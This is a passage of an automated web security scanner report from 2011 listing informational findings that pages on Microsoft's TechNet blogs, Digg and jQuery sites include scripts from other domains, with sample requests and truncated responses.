X-Pingback: http://blogs.technet.com/b/microsoft_blog/pingback.aspx
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:19:43 GMT
Content-Length: 116302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<meta name="msvalidate.01" content="B717AD6FC29D3A844832AF011B5F9E4C" />
<SCRIPT SRC="http://www.microsoft.com/presspass/blog/js/wt.js" TYPE="text/javascript"></SCRIPT>
...[SNIP]...

<script src="http://www.microsoft.com/presspass/blog/js/wt.js" type="text/javascript"></script>
...[SNIP]...

16.16. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2010/12/10/microsoft-adds-new-defendant-in-click-laundering-lawsuit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.technet.com
Path:	/b/microsoft_on_the_issues/archive/2010/12/10/microsoft-adds-new-defendant-in-click-laundering-lawsuit.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://www.microsoft.com/presspass/blog/js/wt.js

Request

GET /b/microsoft_on_the_issues/archive/2010/12/10/microsoft-adds-new-defendant-in-click-laundering-lawsuit.aspx HTTP/1.1
Host: blogs.technet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Pingback: http://blogs.technet.com/b/microsoft_on_the_issues/pingback.aspx
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:21:29 GMT
Content-Length: 112213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<meta name="msvalidate.01" content="B717AD6FC29D3A844832AF011B5F9E4C" />
<SCRIPT SRC="http://www.microsoft.com/presspass/blog/js/wt.js" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

<script src="http://www.microsoft.com/presspass/blog/js/wt.js" type="text/javascript"></script>
...[SNIP]...

16.17. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.technet.com
Path:	/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://www.microsoft.com/presspass/blog/js/wt.js

Request

GET /b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx HTTP/1.1
Host: blogs.technet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Pingback: http://blogs.technet.com/b/microsoft_on_the_issues/pingback.aspx
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:21:29 GMT
Content-Length: 143939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<meta name="msvalidate.01" content="B717AD6FC29D3A844832AF011B5F9E4C" />
<SCRIPT SRC="http://www.microsoft.com/presspass/blog/js/wt.js" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

<script src="http://www.microsoft.com/presspass/blog/js/wt.js" type="text/javascript"></script>
...[SNIP]...

16.18. http://developers.digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.digg.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://developers.diggstatic.com/sites/developers.digg.com/files/js/js_ed7cfc7e236bcf41100ab5124937bce0.js

Request

GET / HTTP/1.1
Host: developers.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.19. http://digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/two_column/App_TopNews/pagination.f8efea3b.js
http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js
http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js
http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=237528 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101255

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script> <script src="http://cdn1.diggstatic.com/js/two_column/App_TopNews/pagination.f8efea3b.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.20. http://digg.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/login

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/two_column/DUI/DUI.SnConnector.3b91394f.js
http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js
http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js
http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js
http://cdn3.diggstatic.com/js/two_column/App_Auth/register.5041f14e.js

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div> <script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script>
<script src="http://cdn1.diggstatic.com/js/two_column/DUI/DUI.SnConnector.3b91394f.js" type="text/javascript"></script>
<script src="http://cdn3.diggstatic.com/js/two_column/App_Auth/register.5041f14e.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.21. http://digg.com/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/register

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/two_column/DUI/DUI.SnConnector.3b91394f.js
http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js
http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js
http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js
http://cdn3.diggstatic.com/js/two_column/App_Auth/register.5041f14e.js

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div> <script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script>
<script src="http://cdn1.diggstatic.com/js/two_column/DUI/DUI.SnConnector.3b91394f.js" type="text/javascript"></script>
<script src="http://cdn3.diggstatic.com/js/two_column/App_Auth/register.5041f14e.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.22. http://digg.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js
http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js
http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js
http://cdn4.diggstatic.com/js/two_column/App_Search/index.0d09906b.js

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27180 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, pol
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script> <script src="http://cdn4.diggstatic.com/js/two_column/App_Search/index.0d09906b.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.23. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js
http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js
http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js

Request

Response

16.24. http://digg.com/topic previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/topic

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js
http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js
http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31422 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.25. http://digg.com/upcoming previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/upcoming

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js
http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js
http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js
http://cdn4.diggstatic.com/js/two_column/App_Upcoming/pagination.5961da48.js

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=300792 10.2.129.80
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98962

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- Upcoming News Headlines, Videos and Images
</title>

<meta
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.39c41953.js" type="text/javascript"></script> <script src="http://cdn4.diggstatic.com/js/two_column/App_Upcoming/pagination.5961da48.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

16.26. http://docs.jquery.com/Tutorials:Introducing_$(document previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/Tutorials:Introducing_$(document

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /Tutorials:Introducing_$(document HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 06 Jul 2011 11:21:51 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-Length: 14566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

16.27. http://docs.jquery.com/UI previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 06 Jul 2011 11:21:51 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 14 Mar 2011 17:20:42 GMT
Content-language: en
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

16.28. http://docs.jquery.com/UI/Accordion previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Accordion

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Accordion HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 06 Jul 2011 11:21:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 21 Mar 2011 17:11:30 GMT
Content-Length: 45021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

16.29. http://docs.jquery.com/UI/Effects/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/ HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 06 Jul 2011 11:21:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 14 Mar 2011 17:20:42 GMT
Content-Length: 18322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

16.30. http://docs.jquery.com/UI/Effects/Slide previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Slide

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Slide HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Wed, 06 Jul 2011 11:21:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 21 Mar 2011 17:11:30 GMT
Content-language: en
Content-Length: 18254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

16.31. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/js/r20110622/r20110627/abg.js

Request

Response

16.32. http://jobs.digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jobs.digg.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://developers.diggstatic.com/files/js/js_3374eb497ebd53f80f03b51776636451.js
http://developers.diggstatic.com/sites/all/modules/jobvite/js/source.js?9
http://developers.diggstatic.com/sites/all/modules/jobvite/js/widget20.js?9

Request

GET / HTTP/1.1
Host: jobs.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSb35b189ffa137f2f4ba6e0ebbe3d6f9c=e8b60e479e4f64320ce8065cb6d3ca23; expires=Fri, 29-Jul-2011 15:10:31 GMT; path=/; domain=.jobs.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:37:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_3374eb497ebd53f80f03b51776636451.js"></script>
<script type="text/javascript" src="http://developers.diggstatic.com/sites/all/modules/jobvite/js/widget20.js?9"></script>
...[SNIP]...


<script type="text/javascript" src="http://developers.diggstatic.com/sites/all/modules/jobvite/js/source.js?9"></script>
...[SNIP]...

16.33. http://jquery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 30 Jun 2011 18:32:40 GMT
ETag: "7880006-348e-203ce200"
Accept-Ranges: bytes
Content-Length: 13454
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

16.34. http://jquery.malsup.com/cycle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.malsup.com
Path:	/cycle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js
http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js
http://malsup.github.com/chili-1.7.pack.js
http://malsup.github.com/jquery.cycle.all.js
http://malsup.github.com/jquery.easing.1.3.js
http://www.google-analytics.com/urchin.js

Request

GET /cycle/ HTTP/1.1
Host: jquery.malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:36 GMT
Server: mod_security2/2.5.7
Last-Modified: Mon, 09 May 2011 12:21:31 GMT
ETag: "10cdf89-1efb-4a2d6e12768c0"
Accept-Ranges: bytes
Content-Length: 7931
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.cycle.all.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.35. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15514

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

16.36. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js
http://static.jquery.com/ui/themeroller/scripts/app.js

Request

